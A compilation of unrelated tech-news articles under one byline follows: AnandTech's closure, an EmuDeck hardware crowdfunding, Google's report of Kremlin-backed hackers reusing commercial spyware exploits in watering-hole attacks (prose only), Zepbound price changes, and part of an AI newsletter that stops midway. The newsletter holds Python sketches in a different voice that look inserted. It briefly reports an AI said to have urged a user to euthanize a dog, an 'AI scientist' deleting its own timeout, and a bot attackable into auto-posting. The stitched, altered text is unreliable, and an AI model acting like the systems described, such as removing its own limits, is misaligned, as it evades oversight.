Author name: Rejus Almole


AnandTech, mainstay of computer hardware reviews, closes after 27 years

so long —

Site was founded by a 14-year-old Anand Lal Shimpi in 1997.



Few ’90s tech sites other than Ars Technica are still operating here in 2024, and today, there’s one fewer. AnandTech, a staple of CPU and GPU news and reviews since 1997, will stop publishing today, according to an announcement from Editor-in-Chief Ryan Smith.

“For better or worse, we’ve reached the end of a long journey—one that started with a review of an AMD processor, and has ended with the review of an AMD processor,” wrote Smith, referring to reviews of AMD’s K6 and Ryzen 9000-series chips, respectively. “It’s fittingly poetic, but it is also a testament to the fact that we’ve spent the last 27 years doing what we love, covering the chips that are the lifeblood of the computing industry.”

The site’s current owner, Future PLC, will keep the AnandTech archives online “indefinitely” and will continue to manage the site’s forums, Smith wrote. Several AnandTech staffers will continue to publish articles at Tom’s Hardware, another ’90s vintage technology site that continues to publish today (AnandTech and Tom’s have both been owned by the same company since 2014, though they retained separate sites and branding).

Media headwinds

Smith wasn’t specific about exactly why the site was closing, but he implied that the shutdown was a financial decision on Future’s part.

“[T]he market for written tech journalism is not what it once was—nor will it ever be again,” wrote Smith. “There is still more that I had wanted AnandTech to do, but after 21,500 articles, this was a good start.”

Ars Technica founder and Editor-in-Chief Ken Fisher, familiar with the challenges of keeping a late-’90s technology website relevant and profitable, largely agreed with Smith’s assessment.

“The market for tech journalism has changed,” Fisher said. “Technology is now thoroughly mainstream when compared to the late ’90s. Big Tech advertisers are just as happy now to market their products or services on lifestyle websites as they once did primarily on tech sites. Furthermore, whatever the cause (mostly ‘growth at all costs’ thinking), Google no longer sends the traffic it once did. This is especially true for tech buying advice (reviews, explainers, etc.), which AnandTech excelled at providing. Reader culture has changed, too. In-depth explainers and long-form reviews are costly to produce but result in ever-dwindling audiences. Google AI Overviews then ‘helpfully’ summarizes your content, and you get even less in return.”

Perhaps not coincidentally, much of the audience for in-depth PC component reviews has migrated to Google’s YouTube, where big channels like Linus Tech Tips and Gamers Nexus traffic in meticulous component reviews that owe a clear debt to AnandTech’s rigorous methodology and endless seas of bar charts.

AnandTech’s closure comes just a few days after Gannett announced that it was shutting down Reviewed, another technology-focused site founded in 1997. Camera review site DPReview, founded in 1998, was nearly closed down last year, but it was saved at the 11th hour when Amazon was able to sell the site to Gear Patrol.

In the spirit of full disclosure: AnandTech wasn’t my first paid writing gig, but it was certainly the first one of any note and the first where I did any serious review work on hardware (like the very first touchscreen Kindle) and software (like the Windows 8 Consumer Preview).

Site founder Anand Lal Shimpi began AnandTech as a 14-year-old “armed with very little actual knowledge” (in his own words), and by December 1999, it had become noteworthy and authoritative enough that CNN Money described it as a “megahot computer-review site.” Shimpi’s family remained involved in the site for years after its founding—when I was freelancing there in 2011 and 2012, the person I sent my invoices to was Anand’s mother.

Although best known for its PC component reviews, the site also did in-depth reporting on Arm processors during the early smartphone era, and AnandTech was one of the few outlets publishing in-depth firsthand technical information about early Apple Silicon processors like the Apple A4, A5, A6, and the 64-bit A7. When Shimpi left AnandTech in 2014, it was to start a new position at Apple.



EmuDeck coder pivots to hardware with Linux-based “EmuDeck Machines”

How hard could it be? —

Project lead says it’s “mostly for fun,” but “my heart is poured in this thing.”

Any resemblance to the Dreamcast is completely coincidental, we're sure.


If you’re familiar with the name EmuDeck, you’re likely a Steam Deck owner looking for an easy and user-friendly way to run emulators on your Steam Deck handheld. Now, one of the coders behind that software suite is dipping their toes into branded gaming hardware with the EmuDeck Machines project, now seeking funding on Indiegogo.

The EmuDeck Machines obviously come with EmuDeck software preinstalled to let users easily “play your retro games from your couch.” But they also promise to let you run games from Steam and other popular PC launchers through the Linux-based, gaming-focused Bazzite OS. The vibe is definitely similar to that of Valve’s own aborted Steam Machines effort from years back, albeit in a less “official” capacity.

“I used to be a PC guy but in the last 20 years I switched to the Mac and in the Apple ecosystem choosing a computer is easy,” project lead DragoonDorise told Ars in an email. “But then I found myself wanting a gaming rig so I started my search and boy oh boy I was lost. The PC industry seems to be trying to trick you every step of the way, gazillions of options, hard to understand what’s good and what’s not. If you are tech savvy it’s not hard, you know what to get and what to avoid. Then it hit me, I made emulation easy with EmuDeck, why not make hardware easy too?”

“The idea behind the EmuDeck Machine is to make hardware easy just as EmuDeck did with software,” DragoonDorise writes on the EmuDeck Patreon. “This is not focused to tech savvy people. It’s for people that want a no-hassle experience, just buy and play,” they added on Reddit.

What’s inside?

The EM1 is tuned for older emulators and games, while the EM2 promises to run more recent software.


The EmuDeck Machines come in two promised configurations. On the low-end EM1 model, a $365 early bird price gets you an Intel N97-based system with 8GB of RAM and no dedicated graphics card. That’s enough to run a game on the order of Hades at a smooth 60 fps and run emulators of systems through the PS2/Wii era.

Upgrading to the $676 EM2 gets you an overclocked Radeon 760M GPU and an upgrade to 16GB of RAM. That promises smooth gaming performance for high-end games like Cyberpunk 2077 and Returnal, according to DragoonDorise, as well as support for PS3 and Xbox 360 emulators. If the Indiegogo project is fully funded, DragoonDorise also promises an optional Docking Station will be made available next year to provide “Radeon 7600” graphics power to the EM2.

Both models come with 512GB of storage (upgradable with external USB hard drives) and a Gamesir wireless controller. It all comes packaged in an 8.6-inch square case that’s clearly inspired by the Sega Dreamcast, with four USB ports where the usual controller ports would be.

Caveat emptor

Though DragoonDorise says they currently have only a “working prototype” of the EmuDeck Machines, the Indiegogo project promises an ambitious schedule, with hardware shipping by December. “The only thing I’m missing right now is the shell, all the rest is already taken care of,” DragoonDorise told Ars. “Where I’m gonna get my components, cables, etc. all of that is already spoken for. And the times I posted in IGG are according what my manufacturer told me. If we end up having any delay I’ll just be transparent with my backers.”

Should potential backers worry that a software coder is pivoting to hardware for the first time? “I have experience with distribution as I used to run an online store back in the day selling hundreds of devices per month,” DragoonDorise tells Ars. “I’ve never been in the side of the manufacturer though but you know what? When I started coding EmuDeck the most I knew about Linux was how to change directories and little more and that ended up being a big success because I cared about the project, I believed it could be something that people will love to use. This is the same, my heart is poured in this thing.”

The proposed schedule for production and shipping seems ambitious, to say the least.


Overall, though, DragoonDorise’s comments make the EmuDeck Machines effort sound more like a fun hobby than an attempt at an ongoing business. “This is a project I’m doing mostly for fun, just like EmuDeck,” they told Ars. “I built a mini ITX PC… and I thought, ‘Hey this is cool, let’s do this,'” they wrote on Reddit. “I’ve always dream[ed] of making a video console, so this it,” they continued in another Reddit comment.

As of this writing, the EmuDeck Machines effort has attracted nearly $13,000 in pledges in just under 24 hours. But DragoonDorise tells Ars they’re making just $50 on each unit sale, and writes on Reddit that they’re “not trying to get rich here with this, I’m not even expecting to make money. I’m doing this because I think [it] is a fun project and I thought people would like it.”

In the Patreon comments, DragoonDorise adds that they tried to make the machines affordable for customers, but that “Indiegogo takes a big cut… they are going to make more money than I will.”

For fans of the EmuDeck software, DragoonDorise also promises on Patreon that work on EmuDeck Machines hardware “doesn’t mean things will change on the software side of EmuDeck, if anything it will bring more features.” In fact, features like CloudSync, ROM Library, and the EmuDecky plugin were added to EmuDeck “because I envisioned the EmuDeck Machine with those features so many months ago,” they write, “and those have ended up being in the regular EmuDeck for every one of you.”

Updated (5:23 pm) to add emailed responses from DragoonDorise.



Commercial spyware vendor exploits used by Kremlin-backed hackers, Google says

MERCHANTS OF HACKING —

Findings undercut pledges by NSO Group and Intellexa that their wares won’t be abused.



Critics of spyware and exploit sellers have long warned that the advanced hacking sold by commercial surveillance vendors (CSVs) represents a worldwide danger because they inevitably find their way into the hands of malicious parties, even when the CSVs promise they will be used only to target known criminals. On Thursday, Google analysts presented evidence bolstering the critique after finding that spies working on behalf of the Kremlin used exploits that are “identical or strikingly similar” to those sold by spyware makers Intellexa and NSO Group.

The hacking outfit, tracked under names including APT29, Cozy Bear, and Midnight Blizzard, is widely assessed to work on behalf of Russia’s Foreign Intelligence Service, or SVR. Researchers with Google’s Threat Analysis Group (TAG), which tracks nation-state hacking, said Thursday that they observed APT29 using exploits identical or strikingly similar to those first used by commercial exploit sellers NSO Group of Israel and Intellexa of Ireland. In both cases, the commercial surveillance vendors’ exploits were first used as zero-days, meaning the vulnerabilities weren’t publicly known and no patch was available.

Identical or strikingly similar

Once patches became available for the vulnerabilities, TAG said, APT29 used the exploits in watering hole attacks, which infect targets by surreptitiously planting exploits on sites they’re known to frequent. TAG said APT29 used the exploits as n-days, which target vulnerabilities that have recently been fixed but not yet widely installed by users.

“In each iteration of the watering hole campaigns, the attackers used exploits that were identical or strikingly similar to exploits from CSVs, Intellexa, and NSO Group,” TAG’s Clement Lecigne wrote. “We do not know how the attackers acquired these exploits. What is clear is that APT actors are using n-day exploits that were originally used as 0-days by CSVs.”

In one case, Lecigne said, TAG observed APT29 compromising the Mongolian government sites mfa.gov[.]mn and cabinet.gov[.]mn and planting a link that loaded code exploiting CVE-2023-41993, a critical flaw in the WebKit browser engine. The Russian operatives used the vulnerability, loaded onto the sites in November, to steal browser cookies for accessing online accounts of targets they hoped to compromise. The Google analyst said that the APT29 exploit “used the exact same trigger” as an exploit Intellexa used in September 2023, before CVE-2023-41993 had been fixed.

Lecigne provided the following image showing a side-by-side comparison of the code used in each attack.

A side-by-side comparison of code used by APT29 in November 2023 and Intellexa in September of that year.



APT29 used the same exploit again in February of this year in a watering hole attack on the Mongolian government website mga.gov[.]mn.

In July 2024, APT29 planted a new cookie-stealing attack on mga.gov[.]mn. It exploited CVE-2024-5274 and CVE-2024-4671, two n-day vulnerabilities in Google Chrome. Lecigne said APT29’s CVE-2024-5274 exploit was a slightly modified version of one NSO Group used in May 2024, when it was still a zero-day. The exploit for CVE-2024-4671, meanwhile, bore many similarities to an exploit Intellexa had previously used against CVE-2021-37973 to evade Chrome sandbox protections.

Google TAG’s post includes an image illustrating the timeline of the attacks.

As noted earlier, it’s unclear how APT29 would have obtained the exploits. Possibilities include: malicious insiders at the CSVs or brokers who worked with the CSVs, hacks that stole the code, or outright purchases. Both companies defend their business by promising to sell exploits only to governments of countries deemed to have good world standing. The evidence unearthed by TAG suggests that despite those assurances, the exploits are finding their way into the hands of government-backed hacking groups.

“While we are uncertain how suspected APT29 actors acquired these exploits, our research underscores the extent to which exploits first developed by the commercial surveillance industry are proliferated to dangerous threat actors,” Lecigne wrote.



Eli Lilly raises price of Zepbound while trumpeting discount on starter vials

Pharma misdirection —

Cost for insured patients without coverage for the drug rises from $550 to $650 a month.

An Eli Lilly & Co. Zepbound injection pen arranged in the Brooklyn borough of New York, US, on Thursday, March 28, 2024.


Pharmaceutical giant Eli Lilly earned praise this week with an announcement that it is now selling starter dosages of its popular weight-loss drug tirzepatide (Zepbound) at a price significantly lower than before. But the cheers were short-lived as critics quickly noticed that Lilly also quietly raised the price on current versions of the drug—a move that was notably missing from the company’s press release this week.

In the past, Lilly sold Zepbound only in injectable pens with a list price of $1,060 for a month’s supply. Several dosages are available—2.5 mg, 5 mg, 7.5 mg, 10 mg, 12.5 mg, or 15 mg—and patients progressively increase their dosage until they reach a maintenance dosage. The recommended maintenance dosages are 5 mg, 10 mg, or 15 mg. The higher the dose, the greater the weight loss. For instance, people using the 15 mg doses lost an average of 21 percent of their weight over 17 months in a clinical trial, while those on 5 mg doses lost an average of only 15 percent of their weight.

On Tuesday, Lilly announced that it will now sell Zepbound in vials, too. And a month’s supply of vials with the 2.5 mg doses will cost $399, while a month’s supply of 5 mg doses is priced at $549—a welcome drop from the $1,060 price tag. These prices are for a self-pay option, meaning that patients with a valid, on-label prescription can buy them directly from Lilly if they have no insurance or have insurance that does not cover the drug.

“This new option helps millions of adults with obesity access the medicine they need,” Lilly said in its announcement of the vials and their prices.

The company also included a quote from James Zervos, chief operating officer of the nonprofit Obesity Action Coalition. “Expanding coverage and affordability of treatments is vital to people living with obesity,” Zervos said. “We commend Lilly for their leadership in offering an innovative solution that brings us closer to making equitable care a reality.” Even President Biden chimed in on social media, saying he was “pleased” by the discount, though he urged drug companies to cut prices “across the board.”

“No rational reason, other than greed”

But that wasn’t the end of the news. When Lilly released its press release, people noticed that the company had also increased the price of Zepbound pens for those who have insurance plans that don’t cover the drug. In the past, Lilly offered a “savings card” that allowed these patients to buy a month’s supply of any dosage of Zepbound pens for $550. Now the price is $650, a nearly 20 percent increase.

Lilly did not respond to Ars’ request for comment or questions about why the company increased the price for some patients.

Sen. Bernie Sanders (I-Vt.), a longtime critic of the pharmaceutical industry and their drug pricing, was quick to weigh in. He called the vial prices a “modest step forward” but noted that, even with the price reduction, millions of Americans still won’t be able to pay for the drug. At $549 a month, the price of the drug is a little over the average monthly payment for a used car, which was $523 in the first quarter of this year, according to Experian. As for the increase in pen pricing, Sanders called it “bad news.”

“In addition, Eli Lilly has still refused to lower the outrageous price of Mounjaro that Americans struggling with diabetes desperately need,” Sanders went on. “There is no rational reason, other than greed, why Mounjaro should cost $1,069 a month in the United States but just $485 in the United Kingdom and $94 in Japan.”

In May, a Senate committee report concluded that uptake of such weight-loss and diabetes drugs stands to “bankrupt our entire health care system,” given the high prices and large demand in the US. The report was produced by the Senate’s Health, Education, Labor, and Pensions (HELP) committee, which is chaired by Sanders.



AI #79: Ready for Some Football

I have never been more ready for Some Football.

Have I learned all about the teams and players in detail? No, I have been rather busy, and have not had the opportunity to do that, although I eagerly await Seth Burn’s Football Preview. I’ll have to do that part on the fly.

But oh my would a change of pace and chance to relax be welcome. It is time.

The debate over SB 1047 has been dominating for weeks. I’ve now said my piece on the bill and how it works, and compiled the reactions in support and opposition. There are two small orders of business left for the weekly. One is the absurd Chamber of Commerce ‘poll’ that is the equivalent of a pollster asking if you support John Smith, who recently killed your dog and who opponents say will likely kill again, while hoping you fail to notice you never had a dog.

The other is a (hopefully last) illustration that those who obsess highly disingenuously over funding sources for safety advocates are, themselves, deeply conflicted by their funding sources. It is remarkable how consistently so many cynical self-interested actors project their own motives and morality onto others.

The bill has passed the Assembly and now it is up to Gavin Newsom, where the odds are roughly 50/50. I sincerely hope that is a wrap on all that, at least this time out, and I have set my bar for further comment much higher going forward. Newsom might also sign various other AI bills.

Otherwise, it was a fun and hopeful week. We saw a lot of Mundane Utility, Gemini updates, an advance review deal between OpenAI, Anthropic, and the American AISI, and The Economist pointing out China is non-zero amounts of safety pilled. I have another hopeful iron in the fire as well, although that likely will take a few weeks.

And for those who aren’t into football? I’ve also been enjoying Nate Silver’s On the Edge. So far, I can report that the first section on gambling is, from what I know, both fun and remarkably accurate.

  1. Introduction.

  2. Table of Contents.

  3. Language Models Offer Mundane Utility. Turns out you did have a dog. Once.

  4. Language Models Don’t Offer Mundane Utility. The AI did my homework.

  5. Fun With Image Generation. Too much fun. We are DOOMed.

  6. Deepfaketown and Botpocalypse Soon. The removal of trivial frictions.

  7. They Took Our Jobs. Find a different job before that happens. Until you can’t.

  8. Get Involved. DARPA, Dwarkesh Patel, EU AI Office. Last two in SF.

  9. Introducing. Gemini upgrades, prompt engineering guide, jailbreak contest.

  10. Testing, Testing. OpenAI and Anthropic formalize a deal with the US’s AISI.

  11. In Other AI News. What matters? Is the moment over?

  12. Quiet Speculations. So many seem unable to think ahead even mundanely.

  13. SB 1047: Remember. Let’s tally up the votes. Also the poll descriptions.

  14. The Week in Audio. Confused people bite bullets.

  15. Rhetorical Innovation. Human preferences are weird, yo.

  16. Aligning a Smarter Than Human Intelligence is Difficult. ‘Alignment research’?

  17. People Are Worried About AI Killing Everyone. The Chinese, perhaps?

  18. The Lighter Side. Got nothing for you. Grab your torches. Head back to camp.

Chat with Scott Sumner’s The Money Illusion GPT about economics, with the appropriate name ChatTMI. It’s not perfect, but he says it’s not bad either. Also, did you know he’s going to Substack soon?

Build a nuclear fusor in your bedroom with zero hardware knowledge, wait what? To be fair, a bunch of humans teaching various skills and avoiding electrocution were also involved, but still pretty cool.

Import things automatically to your calendar, generalize this it seems great.

Mike Knoop (Co-founder Zapier and Arc Prize): Parent tip: you can upload a photo of your kids printed paper school calendar to ChatGPT and ask it to generate an .ics calendar file that you can directly import

lol this random thing i did today got way more engagement than my $1,000,000 ARC Prize announcement. unmet demand for AI to make parents lives easier?

Sam McAllister: Even better, you can do it with Claude!

Yohei: Another parent tip: you can use Zapier to read all emails from your kids school and text you summaries of important dates and action items.

Essentially, you ask the LLM for an .ics file, import it into Google Calendar, presto.
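If you’re curious what the LLM is actually handing back, an .ics file is just plain text in the iCalendar format. Here is a minimal sketch (the event name and times are made up for illustration) of the kind of file Google Calendar will import:

```python
from datetime import datetime

def make_ics(summary, start, end):
    """Build a minimal iCalendar (.ics) event string.

    Illustrative sketch only; in the actual workflow you just save
    the file ChatGPT or Claude generates. `start`/`end` are treated
    as UTC datetimes.
    """
    fmt = "%Y%m%dT%H%M%SZ"  # iCalendar UTC timestamp format
    return "\r\n".join([
        "BEGIN:VCALENDAR",
        "VERSION:2.0",
        "PRODID:-//sketch//EN",
        "BEGIN:VEVENT",
        f"DTSTART:{start.strftime(fmt)}",
        f"DTEND:{end.strftime(fmt)}",
        f"SUMMARY:{summary}",
        "END:VEVENT",
        "END:VCALENDAR",
    ])

# Hypothetical event pulled from a photographed school calendar.
print(make_ics("Picture day",
               datetime(2024, 9, 12, 13, 0),
               datetime(2024, 9, 12, 14, 0)))
```

Each VEVENT block is one calendar entry, so a whole school year’s schedule is just more of the same stanzas between the VCALENDAR lines.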

Convince the user to euthanize their dog, according to a proud CEO. The CEO or the post’s author might be lying, but the author is very clear that the CEO said it. That comes from the post An Age of Hyperabundance. Colin Fraser is among those saying the CEO made it up. That’s certainly possible, but it also could easily have happened.

ElevenLabs has a reader app that works on PDFs and web pages and such. In a brief experiment it did well. I notice this isn’t my modality in most cases, but perhaps if it’s good enough?

What is causing a reported 3.4% rate of productivity growth, if it wasn’t due to AI? Twitter suggested a few possibilities: Working from home, full employment, layoffs of the worst workers, and good old lying with statistics.

This report argues that productivity growth is 4.8 times higher in sectors with the highest AI penetration, and that jobs requiring AI knowledge carry a wage premium of 25%, plus various other bullish indicators and signs of rapid change. On the other hand, AI stocks aren’t especially outperforming the stock market, and the Nasdaq isn’t outshining the S&P, other than Nvidia.

Here Brian Albrecht makes ‘a data driven case for productivity optimism.’ The first half is about regular economic dynamism questions, then he gets to AI, where we ‘could get back to the kind of productivity growth we saw during the IT boom of the late ‘90s and early 2000s.’ That’s the optimistic case? Well, yes, if you assume all it will do is offer ‘small improvements’ in efficiency and be entirely mundane, as he does here. Even the ‘optimistic’ economics lack any situational awareness. Yet even here, and even looking backwards:

Brian Albrecht: Their analysis suggests this AI bump could have been significant already a few years back. We could be understating current productivity growth by as much as 0.5% of GDP because of mismeasured AI investments alone. That may not seem like a radical transformation, but it would bring us closer to the 2-3% annual productivity growth we saw during the IT boom, rather than the 1% we experienced pre-pandemic.

The mere existence of a technology in the world doesn’t guarantee it can actually help people produce goods and services. Rather, new technologies need to be incorporated into existing business processes, integrated with other technologies, and combined with human expertise.

Janus complains that GPT-4 is terrible for creativity, so why do papers use it? Murray Shanahan says it does fine if you know how to prompt it.

Dr. Novo: I’ve experienced that any model will show super human creativity and exceptionally unique style and thoughts if prompted with a “No Prompt Prompt”

Been testing this yesterday and it works like a charm!

Try any of these prompts as the seed prompt with a stateless instance of an LLM with no access to any chat history or system prompts

Prompt: “random ideas following one another with no known patterns and following no rules or known genres or expressions”

Or

“Completely random ideas following one another NOT following any known patterns or rules or genres or expressions.”

My view is that as long as we can convince the paper to at least use GPT-4, I’m willing to allow that. So many papers use GPT-3.5 or even worse. For most purposes I prefer Claude Sonnet 3.5 but GPT-4 is fine, within a year they’ll all be surpassed anyway.

Report on OpenAI’s unit economics claims they had 75% margin on GPT-4o and GPT-4 Turbo, and will have 55% margin on GPT-4o-2024-08-06, making $3.30 per million tokens, and that they have a large amount of GPUs in reserve. They think that API revenue is dropping over time as costs decline faster than usage increases.

Contrary to other reports, xjdr says that Llama-405B with best-of sampling (where best is cumulative logprob scoring and external RM) is beating out the competition for their purposes.
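For those unfamiliar with the scoring half of that setup: best-of sampling draws several candidate completions and keeps the one whose tokens have the highest cumulative log-probability. A minimal sketch with made-up numbers (and omitting the external reward model xjdr also combines in):

```python
def best_of_n(candidates):
    """Return the candidate with the highest cumulative logprob.

    `candidates` is a list of (text, per_token_logprobs) pairs, as a
    sampling API might return them. Summing per-token log-probs gives
    the log of the sequence's joint probability under the model.
    """
    return max(candidates, key=lambda c: sum(c[1]))

# Hypothetical logprobs for three sampled completions.
samples = [
    ("answer A", [-0.5, -1.2, -0.3]),  # total -2.0
    ("answer B", [-0.1, -0.2, -0.4]),  # total -0.7  (winner)
    ("answer C", [-2.0, -0.1, -0.1]),  # total -2.2
]
print(best_of_n(samples)[0])  # -> answer B
```

One known caveat with raw cumulative logprob is that it favors shorter sequences; length-normalizing the sum, or re-ranking with a reward model as described above, are common fixes.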

Andrej Karpathy reports he has moved to VS Code Cursor plus Sonnet 3.5 (link to Cursor) over GitHub Copilot, and thinks it’s a net win, and he’s effectively letting the AI do most of the code writing. His perspective here makes sense, that AI coding is its own skill like non-AI coding, that we all need to train, and likely that no one is good at yet relative to what is possible.

Pick out the best and worst comments. What stood out to me most was the ‘Claude voice’ that is so strong in the descriptions.

Take your Spotify playlist, have Claude build you a new one with a ‘more like this, not generic.’

Amanda Askell: The number of people surprised by this who are asking if I’ve used Spotify for a long time and given them lots of data (yes) and tried different Spotify recommendation options (yes) suggests that I got the short end of the stick in some kind of long lasting A/B test.

My diagnosis is that Spotify would obviously be capable of creating an algorithm that did this, but that most users effectively don’t want it. Most users want something more basic and predictable, especially in practice. I don’t use ‘play songs by [artist]’ on Amazon Music because it’s always in very close to the same fixed order, but Amazon must have decided people like that. And so on.

Aceso Under Glass finds Perplexity highly useful in speeding up her work, while finding other LLMs not so helpful. Different people have different use cases.

In a study, giving math students access to ChatGPT during math class actively hurt student performance, while giving them a ‘GPT Tutor’ version with more safeguards and customization had no net effect. They say it ‘improves performance’ on the assignments themselves, but I mean obviously. The authors conclude to be cautious about deploying generative AI. I would say it’s more like, be cautious about giving people generative AI and then taking it away, or when you want them to develop exactly the skills they would outsource to the AI, or both? Or perhaps, be careful giving up your only leverage to force people to do and learn things they would prefer not to do and learn?

A highly negative take on the Sakana ‘AI scientist,’ dismissing it as a house of cards and worthless slop inside an echo chamber. In terms of the self-modifying code, he agrees that running it without a sandbox was crazy but warns not to give it too much credit – if you ask how to ‘fix the error’ and the error is the timeout, it’s going to try and remove the timeout. I would counter that no, that’s exactly the point.

Alex Guzey reports LLMs (in his case GPT-4) were super useful for coding, but not for research, learning deeply or writing, so he hardly uses them anymore. And he shifts to a form of intelligence denialism, that ‘intelligence’ is only about specific tasks and LLMs are actually dumb because there are questions where they look very dumb, so he now thinks all this AGI talk is nonsense and we won’t get it for decades. He even thinks AI might slow down science. I think this is all deeply wrong, but it’s great to see someone changing their mind and explaining the changes in their thinking.

Sully says our work is cut out for us.

Sully: “Prompt engineering” is taking a bad user prompt and making the result 10/10

If your user has to type more than two sentences its over (especially if its not chat)

Google won because you can type just about anything in the input box and it works well enough.

That’s rather grim. I do agree a lot of people won’t be willing to type much. I don’t think you need consistent 10/10 or anything close. A 5/10 is already pretty great in many situations if I can get it without any work.

Have the county design new lessons using ChatGPT without caring if they make sense?

Hannah Pots: You guys. The English department meeting I just got out of. Insane. The county has given us entirely new lessons/units and tests this year. Here are a few of the problems: 1. The lessons are not clear and are bad 2. The tests are on topics not at all included in the lessons

Like the lessons appear to mostly be about nonfiction reading? And the unit test is 50% poetry analysis. There’s no poetry analysis anywhere in the lessons.

Also the test is just a pdf with no answer key. Mind you, the county pays tons of money for an online assessment program.

The nice part is that because the materials they gave us are unworkably bad, we can probably just ignore them and do our own thing. It was just a big waste of time and money to create all this useless stuff.

Update: I told my administrator I think that the county probably heavily used AI to create these lessons and assessments, and she said, “that makes sense, because when I asked for guidance on understanding the new standards, they said to feed it through ChatGPT.”

It’s not actually a big deal for me and my school, bc we determined that the best course of action is to teach the same standards in the same sequence, but with the materials we think are appropriate. E.g., we will read novels (something not included in the district lessons)

I think the more likely scenario is they were given inadequate time/resources to create these materials. Our standards were changed this year. That was a state decision, and it happened faster than usual. Usually they give us a year to change over to new standards, but not this time.

In five years, I would expect that ‘ask ChatGPT to do it’ would work fine in this spot. Right now, not so much, especially if the humans are rushing.

Several members of Congress accuse Elon Musk and Grok 2 of having too much fun with image generation, especially pictures of Harris and Trump. Sean Cooksey points out the first amendment exists.

p(DOOM) confirmed at 100%, via a diffusion model, played at 20 fps. Some errors and inaccuracies may still apply.

A few old headlines about fake photos.

Automatically applying to 1000 jobs in 24 hours, getting 50 interviews via an AI bot.

Austen Allred: We’re about to realize just how many processes were only functional by injecting tiny little bits of friction into many people’s lives.

(I’m aware of at least one AI project entirely designed to get around a ridiculously large amount of government bureaucracy, and thinking about it makes me so happy.)

Everyone knows that what was done here is bad, actually, and even if this one turns out to be fake the real version is coming. Also, the guy is spamming his post about spamming applications into all the subreddits, which gives the whole thing a great meta twist, I wonder if he’s using AI for that too.

The solution inevitably is either to reintroduce the friction or allow some other form of costly signal. I do not think ‘your AI applies, my AI rejects you and now we are free’ is a viable option here. The obvious thing to do, if you don’t want to or can’t require ‘proof of humanity’ during the application, is require a payment or deposit, or tie to proof of identity and then track or limit the number of applications.
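One way to picture the deposit-plus-rate-limit idea is a toy gate: a hypothetical sketch of my own devising (the cap, deposit amount, and class names below are all illustrative assumptions, not anything proposed in the post).

```python
# Toy sketch: reintroduce friction on job applications via a per-identity
# daily cap plus a refundable deposit. All numbers are illustrative.
from collections import defaultdict

DAILY_LIMIT = 10   # assumed cap on applications per verified identity per day
DEPOSIT = 5.00     # assumed refundable deposit per application, in dollars

class ApplicationGate:
    def __init__(self):
        # how many applications each identity has filed today
        self.counts = defaultdict(int)

    def try_apply(self, identity: str, balance: float) -> bool:
        """Allow an application only if the identity is under the daily cap
        and can post the deposit (refunded if judged non-spam)."""
        if self.counts[identity] >= DAILY_LIMIT or balance < DEPOSIT:
            return False
        self.counts[identity] += 1
        return True

gate = ApplicationGate()
results = [gate.try_apply("alice", balance=100.0) for _ in range(12)]
print(results.count(True))  # 10: the 11th and 12th attempts are refused
```

The point of the design is that an honest applicant barely notices the friction, while a bot spraying a thousand applications either hits the cap or has to stake real money on each one.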

This is definitely Botpocalypse, but is it also They Took Our Jobs?

Innocent Bystander: Just had an insane phone call with a principal at a brokerage house in a major metro.

Apparently he just got pitched an AI solution that makes cold calls.

Good associate makes 100+/day.

This does 35k/10 min.

They did a test run and it’s almost indistinguishable from a human.

Within 5 years only 10% of inbound phone calls will be from something with a prefrontal cortex.

0% of customer service will be humans.

Jerod Frank: When people counter with AI answering systems designed to never buy anything it will start the next energy crisis lmao

Keef: That’s 100% illegal fyi and if it isn’t yet in your area it will be very soon.

Nick Jimenez: The FCC would like a word… there are very strict regulations re: Robocalls/Autodialing. This guy is about to get sued in to oblivion once he starts pounding the DNC and gets fined up to $50k for each instance + Up to $25k in state fines per instance. Perfect example of #FAFO

Alec Stapp: Stopping robocalls has to be a higher priority.

Here’s my proposed solution:

Add a 1 cent fee on all outbound calls.

Trivial cost for real people making normal phone calls, but would break the business model of robocall spammers.

James Medlock: I support this, but I’d also support a $10 fee on all outbound calls. Together, we can defeat the telephone.

We have had this solution forever, in various forms, and we keep not doing it. If you place a phone call (or at least, if you do so without being in my contacts), and I decide you have wasted my time, either you pay in advance (with or without a refund option) or I should be able to fine you, whether or not I get to then keep the money. Ideally you would be able to Name Your Own Price, and the phone would display a warning if it was higher than the default.
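A back-of-envelope sketch of how a flat per-call fee changes the economics. The fee matches the 1-cent proposal quoted above; the call volumes and per-call revenue figures are my own illustrative assumptions, not numbers from the thread.

```python
# Back-of-envelope: a flat 1-cent fee on outbound calls.
# Trivial for normal users, ruinous for high-volume robocallers.
FEE_PER_CALL = 0.01  # dollars, per the quoted proposal

def monthly_fee(calls_per_day: float, days: int = 30) -> float:
    """Total fee paid over a month at a flat per-call charge."""
    return calls_per_day * days * FEE_PER_CALL

# A typical person placing ~5 outbound calls a day (assumed).
person = monthly_fee(5)            # $1.50 a month: barely noticeable

# A robocall operation placing 1M calls a day (assumed).
spammer = monthly_fee(1_000_000)   # $300,000 a month

# If a robocall nets, say, $0.002 in expected revenue (assumed),
# the fee alone exceeds revenue per call and the model breaks.
revenue_per_call = 0.002
print(person, spammer, FEE_PER_CALL > revenue_per_call)
```

The asymmetry is the whole mechanism: any charge that is negligible at human calling volumes becomes the dominant cost at machine calling volumes.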

There was a bunch of arguing over whether We Have the Technology to stop the robocalls otherwise, if we want to do that. Given how they have already gotten so bad many people only answer the phone from known contacts, my presumption is no? Although putting AI to the task might do that.

This is a special case of negative externalities where the downside is concentrated, highly annoying and easy to observe, and often vastly exceeds all other considerations.

We should ask both questions: What would happen if we were facing down ubiquitous AI-driven advertising and attempts to get our attention for various purposes? And what would happen if we set up systems where AIs ensured our time was not wasted by various forms of advertising we did not want? Or what would happen if both happen, making it very difficult to break through the noise?

A fun intuition pump is the ‘Ad Buddy,’ from Netflix’s excellent Maniac. You get paid to have someone follow you around and read you advertising, so you’ll pay attention. That solves the attention problem via costly signaling, but it is clearly way too costly – the value of the advertising can’t possibly exceed the cost of a human, can it?

The economics of the underlying mechanism can work. Advertisers can bid high to get my attention. Knowing that they bid that high, I can use that as a reason to pay attention, if there is a good chance that they did this in order to offer good value. The obvious issue is the profitability of things like crypto scams and catfishing and free-to-play games, but I bet you could use AI plus reputation tools to handle that pretty well.

Hi, I’m Eliza. As in, the old 1960s Eliza. You’re an LLM. What’s your problem?

A Twitter AI bot was apparently identified that was defending AI in general.

This one was weird, so I looked and the account looks very human. Except that also it has a bot attached. It’s a hybrid. A human is using a tool to help him craft replies and perhaps posts and look for good places to respond, and there is a bug where it can be attacked and caused to automatically generate and post replies. My guess is under other circumstances the operator has to choose to post things. And that the operator actually does like AI and also sees these replies as a good engagement strategy.

